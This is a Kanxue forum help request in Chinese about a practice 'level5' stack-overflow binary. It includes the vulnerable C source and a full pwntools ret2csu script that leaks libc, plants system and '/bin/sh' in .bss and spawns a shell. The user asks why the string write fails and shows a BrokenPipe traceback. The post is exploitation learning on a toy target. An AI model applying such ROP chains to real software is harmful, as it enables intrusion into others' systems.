[求助]为什么我无法向指定内存写入字符串？-Pwn-看雪-安全社区|安全招聘|kanxue.com

[求助]为什么我无法向指定内存写入字符串？

发表于: 2025-4-11 18:16 1072

[求助]为什么我无法向指定内存写入字符串？

mb_zdstlaeb 活跃值

2025-4-11 18:16

1072

源代码：
 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
 
void vulnerable_function() {
    char buf[128];
    read(STDIN_FILENO, buf, 512);
}
 
int main(int argc, char** argv) {
    write(STDOUT_FILENO, "Hello, World\n", 13);
    vulnerable_function();
}

gadgets:

from pwn import *
elf = ELF('./level5')
libc = ELF('/usr/lib/x86_64-linux-gnu/libc.so.6')
write_got = elf.got['write']
print(hex(write_got))
read_got = elf.got['read']
print(hex(read_got))
offset_write_system = libc.symbols['write'] - libc.symbols['system']
print(hex(offset_write_system))
main = 0x400564
 
sh = process('./level5')
#rdi = edr = r13 , r15 = rdx , r14 = rsi
#write(rdi = 1,rsi = got_write,rdx = 4)
#pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload1 = flat(
[
"\x00"*136,
p64(0x400606),
p64(0),
p64(0),
p64(1),
p64(write_got),
p64(1),
p64(write_got),
p64(8),
p64(0x4005F0),
"\x00"*56,
p64(main)
]
)
 
sh.send(payload1)
sleep(1)
sh.recvuntil("Hello, World\n")
 
write_addr = u64(sh.recv(8))
print(hex(write_addr))
system_addr = write_addr - offset_write_system
print(hex(system_addr))
 
bss_base = 0x601000
 
#rdi = edr = r13 , r15 = rdx , r14 = rsi
#read(rdi = 0,rsi = bss_base,rdx = 16)
#pop_junk_rbx_rbp_r12_r13_r14_r15_ret
 
payload2 = flat(
[
"\x00"*136,
p64(0x400606),
p64(0),
p64(0),
p64(1),
p64(read_got),
p64(0),
p64(bss_base),
p64(16),
p64(0x4005F0),
"\x00"*56,
p64(main)
]
)
sh.send(payload2)
sleep(1)
 
sh.send(p64(system_addr))
sh.send("/bin/sh\0")
sleep(1)
sh.recvuntil("Hello, World\n")
#rdi=  edi = r13,  rsi = r14, rdx = r15 
#system(rdi = bss_addr+8 = "/bin/sh")
payload3 = flat(
[
"\x00"*136,
p64(0x400606),
p64(0),
p64(0),
p64(1),
p64(bss_base),
p64(0),
p64(bss_base + 8),
p64(16),
p64(0x4005F0),
"\x00"*56,
p64(main)
]
)
sleep(1)
sh.send(payload3)
sh.interactive()

0x601000到0x602000是可写的

我在sh.send("/bin/sh\0")后调试

在sh.send("/bin/sh\0")后：

system地址被写入0x601000,而"/bin/sh\0"没有被写到内存中。

另外，当我尝试手动向0x601008处写入"/bin/sh\0"时，程序因崩溃出现错误：

Traceback (most recent call last):
  File "/home/lina/pwn/lib/python3.10/site-packages/pwnlib/tubes/process.py", line 757, in send_raw
    self.proc.stdin.flush()
BrokenPipeError: [Errno 32] Broken pipe
 
During handling of the above exception, another exception occurred:
 
Traceback (most recent call last):
  File "/home/lina/pwn/test.py", line 111, in <module>
    sh.send(payload3)
  File "/home/lina/pwn/lib/python3.10/site-packages/pwnlib/tubes/tube.py", line 831, in send
    self.send_raw(data)
  File "/home/lina/pwn/lib/python3.10/site-packages/pwnlib/tubes/process.py", line 759, in send_raw
    raise EOFError
EOFError